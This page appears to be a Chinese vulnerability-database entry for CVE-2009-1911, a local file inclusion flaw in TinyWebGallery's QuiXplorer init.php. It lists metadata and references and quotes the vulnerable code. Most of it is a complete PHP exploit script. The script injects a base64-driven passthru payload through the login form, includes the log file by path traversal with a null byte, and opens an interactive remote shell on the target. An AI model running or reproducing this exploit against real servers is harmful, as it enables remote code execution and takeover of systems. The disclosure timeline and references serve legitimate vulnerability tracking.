Tinywebgallery QuiXplorer "init.php" 目录遍历和文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117734 漏洞类型 路径遍历
发布时间 2009-05-08 更新时间 2009-06-05
CVE编号 CVE-2009-1911 CNNVD-ID CNNVD-200906-060
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/8649
https://cxsecurity.com/issue/WLB-2009060105
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-060
|漏洞详情
STinyWebGallery(TWG)是软件开发者MichaelDempfle所研发的一套基于Ajax、PHP和XML的开源相册,它提供文字和图片水印、幻灯片播放、图像上传和管理等功能。TinyWebGallery的/admin/_include/init.php模块没有正确地验证用户请求中的$_GET['lang']参数:110.//GetLanguage111.if(isset($GLOBALS['__GET']["lang"]))$GLOBALS["lang"]=$GLOBALS["language"]=$_SESSION["admin_lang"]=$GLOBALS['__GET']["lang"];112.elseif(isset($GLOBALS['__POST']["lang"]))$GLOBALS["lang"]=$GLOBALS["language"]=$_SESSION["admin_lang"]=$GLOBALS['__POST']["lang"];113.elseif(isset($_SESSION["admin_lang"]))$GLOBALS["lang"]=$GLOBALS["language"]=$_SESSION["admin_lang"];114.else$GLOBALS["language"]=$GLOBALS["default_language"];115.[...]138.139.//------------------------------------------------------------------------------140.//Necessaryfiles141.require_QUIXPLORER_PATH."/_config/conf.php";142.143.if(file_exists(_QUIXPLORER_PATH."/_lang/".$GLOBALS["language"].".php"))144.require_QUIXPLORER_PATH."/_lang/".$GLOBALS["language"].".php";145.elseif(file_exists(_QUIXPLORER_PATH."/_lang/".$GLOBALS["default_language"].".php"
|漏洞EXP
<?php

/*
	-----------------------------------------------------------
	TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit
	-----------------------------------------------------------
	
	author...: EgiX
	mail.....: n0b0d13s[at]gmail[dot]com
	
	link.....: http://www.tinywebgallery.com/
	details..: this vulnerability drift from QuiXplorer (http://quixplorer.sourceforge.net/)

	This PoC was written for educational purpose. Use it at your own risk.
	Author will be not responsible for any damage.

	[-] vulnerable code in /admin/_include/init.php

	110.	// Get Language
	111.	if (isset($GLOBALS['__GET']["lang"]))  $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] =  $GLOBALS['__GET']["lang"];
	112.	elseif (isset($GLOBALS['__POST']["lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] =  $GLOBALS['__POST']["lang"];
	113.	else if (isset($_SESSION["admin_lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"];  
	114.	else $GLOBALS["language"] = $GLOBALS["default_language"];
	115.	
			[...]
	138.	
	139.	// ------------------------------------------------------------------------------
	140.	// Necessary files
	141.	require _QUIXPLORER_PATH . "/_config/conf.php";
	142.	
	143.	if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php"))
	144.	    require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php";
	145.	else if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php"))
	146.	    require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php";
	147.	else
	148.	    require _QUIXPLORER_PATH . "/_lang/en.php";

	An attacker could be able to include arbitrary local files through the require function at line 144, due to
	$_GET['lang'] parameter isn't properly sanitised. Successful exploitation requires magic_quotes_gpc = off

	[-] Disclosure timeline:
		
	[14/04/2009] - Bug discovered
	[25/04/2009] - Vendor contacted
	[26/04/2009] - Vendor replied
	[26/04/2009] - Fix released: http://www.tinywebgallery.com/forum/viewtopic.php?t=1653
	[08/05/2009] - Public disclosure

*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
	if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
	  die("\nsocket_create(): " . socket_strerror($s) . "\n");

	if (socket_connect($s, $host, 80) == false)
	  die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");

	socket_write($s, $packet, strlen($packet));
	while ($m = socket_read($s, 2048)) $response .= $m;

	socket_close($s);
	return $response;
}

function check_target()
{
	global $host, $path;

	$packet  = "GET {$path}info.php?showphpinfo=true HTTP/1.0\r\n";
	$packet .= "Host: {$host}\r\n";
	$packet .= "Connection: close\r\n\r\n";

	preg_match('/magic_quotes_gpc<\/td><td class="v">(.*)<\/td><td/', http_send($host, $packet), $match);

	if ($match[1] != "Off") die("\n[-] Exploit failed...magic_quotes_gpc = on\n");
}

function inject_code()
{
	global $host, $path;

	$code	 = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die} ?>";
	$payload = "p_user={$code}&p_pass=";

	$packet  = "POST {$path}admin/index.php?action=login HTTP/1.0\r\n";
	$packet .= "Host: {$host}\r\n";
	$packet .= "Content-Length: ".strlen($payload)."\r\n";
	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
	$packet .= "Connection: close\r\n\r\n";
	$packet .= $payload;

	http_send($host, $packet);
}

print "\n+---------------------------------------------------------------------+";
print "\n| TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";

if ($argc < 3)
{
	print "\nUsage......: php $argv[0] host path\n";
	print "\nExample....: php $argv[0] localhost /";
	print "\nExample....: php $argv[0] localhost /twg/\n";
	die();
}

$host = $argv[1];
$path = $argv[2];

check_target();
inject_code();

$packet  = "GET {$path}admin/index.php?lang=../../counter/_twg.log%%00 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while (1)
{
	print "\ntwg-shell# ";
	if (($cmd = trim(fgets(STDIN))) == "exit") break;
	$response = http_send($host, sprintf($packet, base64_encode($cmd)));
	preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}

?>

# milw0rm.com [2009-05-08]
|参考资料

来源:BID
名称:34892
链接:http://www.securityfocus.com/bid/34892
来源:XF
名称:tinywebgallery-init-file-include(50408)
链接:http://xforce.iss.net/xforce/xfdb/50408
来源:www.tinywebgallery.com
链接:http://www.tinywebgallery.com/forum/viewtopic.php?t=1653
来源:BUGTRAQ
名称:20090510TinyWebGallery<=1.7.6LFI/RemoteCodeExecutionExploit
链接:http://www.securityfocus.com/archive/1/archive/1/503396/100/0/threaded
来源:MILW0RM
名称:8649
链接:http://www.milw0rm.com/exploits/8649
来源:SECUNIA
名称:35060
链接:http://secunia.com/advisories/35060
来源:SECUNIA
名称:35020
链接:http://secunia.com/advisories/35020